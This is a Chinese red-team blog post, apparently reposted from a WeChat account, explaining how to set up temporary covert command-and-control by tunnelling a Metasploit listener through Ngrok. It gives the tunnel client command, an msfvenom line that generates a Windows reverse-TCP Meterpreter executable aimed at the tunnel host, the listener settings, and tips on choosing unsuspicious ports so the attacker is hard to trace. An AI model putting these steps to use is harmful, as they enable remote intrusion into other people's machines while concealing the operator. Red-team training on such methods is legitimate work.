Ngrok + Metasploit = 暂时性隐蔽C2

admin 2021年7月25日02:09:07评论100 views字数 1049阅读3分29秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

Ngrok + Metasploit = 暂时性隐蔽C2


大家好,这里是 渗透攻击红队 的第 55 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新


Ngrok + Metasploit = 暂时性隐蔽C2
Ngrok


Ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。


反向代理在计算机网络中是代理服务器的一种。服务器根据客户端的请求,从其关系的一组或多组后端服务器(如Web服务器)上获取资源,然后再将这些资源返回给客户端,客户端只会得知反向代理的IP地址,而不知道在代理服务器后面的服务器集群的存在。


通过利用 Ngrok 我们可以使用最少的成本去通过 Metasploit 隐蔽自己,从而达到目标很难追踪到自己。


内网 Kali 通过 Ngrok 穿透反弹 shell 到 Metasploit

具体演示


首先要去下载一个 Ngrok 客户端:https://www.ngrok.cc/download.html

Ngrok + Metasploit = 暂时性隐蔽C2

这里主要选择 tcp 隧道,然后本地端口也就是 Kail 要监听的端口,我这里选了8888 端口(在实际攻击场景中尽量选择一些不让人怀疑的高端口,例如 26458 等等,别设置例如:4444 、5555、6666 这种端口,具体原因不必多说),然后会有一个域名和隧道ID:

Ngrok + Metasploit = 暂时性隐蔽C2

Ngrok + Metasploit = 暂时性隐蔽C2

然后在 Kali 上运行 Ngrok:

./sunny clientid 你的隧道id

Ngrok + Metasploit = 暂时性隐蔽C2

Ngrok + Metasploit = 暂时性隐蔽C2

这个时候就做好内网穿透了!因为是通过 Kali 本机的 8888 端口给转发到 Ngrok 的 10073,所以就得生成一个反向,然后端口是 10073 的木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxxx.xxxx.com LPORT=10073 -f exe > 8888.exe

Ngrok + Metasploit = 暂时性隐蔽C2

最后 Kali 打开 MSF 控制台 msfconsole 开启监听(注意这里的端口需要设置为 8888,ip设置为本地 127.0.0.1 ):

msf > set lhost 127.0.0.1msf > set lport 8888msf > exploit

Ngrok + Metasploit = 暂时性隐蔽C2最后运行 8888.exe 成功反弹 Meterpreter 到 Metasploit:

cmd /c start 8888.exe

Ngrok + Metasploit = 暂时性隐蔽C2

Ngrok + Metasploit = 暂时性隐蔽C2

这样就能实现无需公网 VPS 就能反弹 Shell。通过这样的方式能够以最少的成本去隐蔽自己,当然这种方式也不是最有效的隐蔽手段,但是是最快捷的方式,通过 Ngrok 能基本上能满足大部分渗透的需求。


Ngrok + Metasploit = 暂时性隐蔽C2

渗透攻击红队

一个专注于渗透红队攻击的公众号

Ngrok + Metasploit = 暂时性隐蔽C2



Ngrok + Metasploit = 暂时性隐蔽C2
点分享
Ngrok + Metasploit = 暂时性隐蔽C2
点点赞
Ngrok + Metasploit = 暂时性隐蔽C2
点在看

本文始发于微信公众号(渗透攻击红队):Ngrok + Metasploit = 暂时性隐蔽C2

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日02:09:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ngrok + Metasploit = 暂时性隐蔽C2http://cn-sec.com/archives/341510.html

发表评论

匿名网友 填写信息